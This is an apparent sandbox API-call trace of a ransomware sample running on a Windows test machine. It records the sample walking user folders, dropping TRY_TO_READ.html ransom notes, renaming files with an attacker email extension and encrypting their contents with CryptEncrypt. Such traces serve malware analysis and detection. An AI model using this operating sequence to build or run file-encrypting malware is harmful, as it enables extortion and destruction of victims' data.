	[0106.522] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", dwFileAttributes=0x80) returned 1
	[0106.523] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 74
	[0106.523] GetProcessHeap () returned 0x540000
	[0106.523] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8670
	[0106.523] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url"
	[0106.523] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.523] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.525] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538
	[0106.525] GetProcessHeap () returned 0x540000
	[0106.525] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.525] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.525] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.525] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.525] GetProcessHeap () returned 0x540000
	[0106.525] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.525] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.525] WriteFile (in: hFile=0x538, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.526] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.526] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.527] ReadFile (in: hFile=0x538, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.527] SetFilePointer (in: hFile=0x538, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.527] WriteFile (in: hFile=0x538, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.527] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30696a40, ftCreationTime.dwHighDateTime=0x1d4c746, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daff0
	[0106.527] FindNextFileW (in: hFindFile=0x5daff0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30696a40, ftCreationTime.dwHighDateTime=0x1d4c746, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.527] FindNextFileW (in: hFindFile=0x5daff0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf67def0, ftCreationTime.dwHighDateTime=0x1d4cb20, ftLastAccessTime.dwLowDateTime=0xdf47b4e0, ftLastAccessTime.dwHighDateTime=0x1d4d32b, ftLastWriteTime.dwLowDateTime=0xdf47b4e0, ftLastWriteTime.dwHighDateTime=0x1d4d32b, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Iy8fP6UjQjUX-k-.m4a", cAlternateFileName="IY8FP6~1.M4A")) returned 1
	[0106.527] FindNextFileW (in: hFindFile=0x5daff0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8376310, ftCreationTime.dwHighDateTime=0x1d4cf5c, ftLastAccessTime.dwLowDateTime=0xa4a65ff0, ftLastAccessTime.dwHighDateTime=0x1d4c8c0, ftLastWriteTime.dwLowDateTime=0xa4a65ff0, ftLastWriteTime.dwHighDateTime=0x1d4c8c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mogqMJetuOJ", cAlternateFileName="MOGQMJ~1")) returned 1
	[0106.527] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\mogqMJetuOJ\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\mogqmjetuoj\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c
	[0106.529] FindNextFileW (in: hFindFile=0x5daff0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe656c330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.529] FindNextFileW (in: hFindFile=0x5daff0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43b64160, ftCreationTime.dwHighDateTime=0x1d4d0db, ftLastAccessTime.dwLowDateTime=0x624517f0, ftLastAccessTime.dwHighDateTime=0x1d4cfe6, ftLastWriteTime.dwLowDateTime=0x624517f0, ftLastWriteTime.dwHighDateTime=0x1d4cfe6, nFileSizeHigh=0x0, nFileSizeLow=0x10240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxXP9DcS1LZS4ud bwi.wav", cAlternateFileName="XXXP9D~1.WAV")) returned 1
	[0106.529] FindNextFileW (in: hFindFile=0x5daff0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb93ee330, ftCreationTime.dwHighDateTime=0x1d4cfdf, ftLastAccessTime.dwLowDateTime=0xac3ec680, ftLastAccessTime.dwHighDateTime=0x1d4d149, ftLastWriteTime.dwLowDateTime=0xac3ec680, ftLastWriteTime.dwHighDateTime=0x1d4d149, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yF-2d0SR0", cAlternateFileName="YF-2D0~1")) returned 1
	[0106.529] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\yF-2d0SR0\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\yf-2d0sr0\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c
	[0106.530] FindNextFileW (in: hFindFile=0x5daff0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb93ee330, ftCreationTime.dwHighDateTime=0x1d4cfdf, ftLastAccessTime.dwLowDateTime=0xac3ec680, ftLastAccessTime.dwHighDateTime=0x1d4d149, ftLastWriteTime.dwLowDateTime=0xac3ec680, ftLastWriteTime.dwHighDateTime=0x1d4d149, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yF-2d0SR0", cAlternateFileName="YF-2D0~1")) returned 0
	[0106.531] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.531] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.531] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav", dwFileAttributes=0x80) returned 1
	[0106.531] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav") returned 80
	[0106.531] GetProcessHeap () returned 0x540000
	[0106.531] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106) returned 0x598b60
	[0106.531] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav"
	[0106.531] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.531] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\xxxp9dcs1lzs4ud bwi.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\xxxp9dcs1lzs4ud bwi.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.574] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\xxXP9DcS1LZS4ud bwi.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\xxxp9dcs1lzs4ud bwi.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c
	[0106.574] GetProcessHeap () returned 0x540000
	[0106.574] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.574] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=66112) returned 1
	[0106.574] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10240
	[0106.575] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.575] GetProcessHeap () returned 0x540000
	[0106.575] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.575] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.575] WriteFile (in: hFile=0x53c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.579] WriteFile (in: hFile=0x53c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.579] WriteFile (in: hFile=0x53c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.579] ReadFile (in: hFile=0x53c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x10240, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x10240, lpOverlapped=0x0) returned 1
	[0106.580] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.580] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.580] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a", dwFileAttributes=0x80) returned 1
	[0106.580] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a") returned 76
	[0106.581] GetProcessHeap () returned 0x540000
	[0106.581] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8670
	[0106.581] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a"
	[0106.581] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.581] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\iy8fp6ujqjux-k-.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\iy8fp6ujqjux-k-.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.610] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\Iy8fP6UjQjUX-k-.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\iy8fp6ujqjux-k-.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c
	[0106.610] GetProcessHeap () returned 0x540000
	[0106.610] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.610] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=26891) returned 1
	[0106.610] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x690b
	[0106.610] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.610] GetProcessHeap () returned 0x540000
	[0106.610] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.610] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.610] WriteFile (in: hFile=0x53c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.611] WriteFile (in: hFile=0x53c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.611] WriteFile (in: hFile=0x53c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.611] ReadFile (in: hFile=0x53c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x690b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x690b, lpOverlapped=0x0) returned 1
	[0106.612] SetFilePointer (in: hFile=0x53c, lDistanceToMove=-26891, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.612] WriteFile (in: hFile=0x53c, lpBuffer=0x6104d0*, nNumberOfBytesToWrite=0x690b, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6104d0*, lpNumberOfBytesWritten=0x3a1f778*=0x690b, lpOverlapped=0x0) returned 1
	[0106.613] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a239170, ftCreationTime.dwHighDateTime=0x1d4d08f, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db030
	[0106.676] FindNextFileW (in: hFindFile=0x5db030, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a239170, ftCreationTime.dwHighDateTime=0x1d4d08f, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.676] FindNextFileW (in: hFindFile=0x5db030, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x121a2f30, ftCreationTime.dwHighDateTime=0x1d4c803, ftLastAccessTime.dwLowDateTime=0xd3f58ec0, ftLastAccessTime.dwHighDateTime=0x1d4d473, ftLastWriteTime.dwLowDateTime=0xd3f58ec0, ftLastWriteTime.dwHighDateTime=0x1d4d473, nFileSizeHigh=0x0, nFileSizeLow=0xbbcb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="03dCcct2oxq2eoxJ.wav", cAlternateFileName="03DCCC~1.WAV")) returned 1
	[0106.676] FindNextFileW (in: hFindFile=0x5db030, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba3c8050, ftCreationTime.dwHighDateTime=0x1d4d401, ftLastAccessTime.dwLowDateTime=0xb68ae730, ftLastAccessTime.dwHighDateTime=0x1d4d1d6, ftLastWriteTime.dwLowDateTime=0xb68ae730, ftLastWriteTime.dwHighDateTime=0x1d4d1d6, nFileSizeHigh=0x0, nFileSizeLow=0x3286, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P8P TWc xDnRPm.wav", cAlternateFileName="P8PTWC~1.WAV")) returned 1
	[0106.676] FindNextFileW (in: hFindFile=0x5db030, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe656c330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.676] FindNextFileW (in: hFindFile=0x5db030, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47d4c20, ftCreationTime.dwHighDateTime=0x1d4d574, ftLastAccessTime.dwLowDateTime=0x60820ad0, ftLastAccessTime.dwHighDateTime=0x1d4c5d8, ftLastWriteTime.dwLowDateTime=0x60820ad0, ftLastWriteTime.dwHighDateTime=0x1d4c5d8, nFileSizeHigh=0x0, nFileSizeLow=0x17afa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="txOFxOeigL.mp3", cAlternateFileName="TXOFXO~1.MP3")) returned 1
	[0106.676] FindNextFileW (in: hFindFile=0x5db030, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47d4c20, ftCreationTime.dwHighDateTime=0x1d4d574, ftLastAccessTime.dwLowDateTime=0x60820ad0, ftLastAccessTime.dwHighDateTime=0x1d4c5d8, ftLastWriteTime.dwLowDateTime=0x60820ad0, ftLastWriteTime.dwHighDateTime=0x1d4c5d8, nFileSizeHigh=0x0, nFileSizeLow=0x17afa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="txOFxOeigL.mp3", cAlternateFileName="TXOFXO~1.MP3")) returned 0
	[0106.676] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.676] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.676] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3", dwFileAttributes=0x80) returned 1
	[0106.751] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3") returned 67
	[0106.753] GetProcessHeap () returned 0x540000
	[0106.753] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xec) returned 0x597dc8
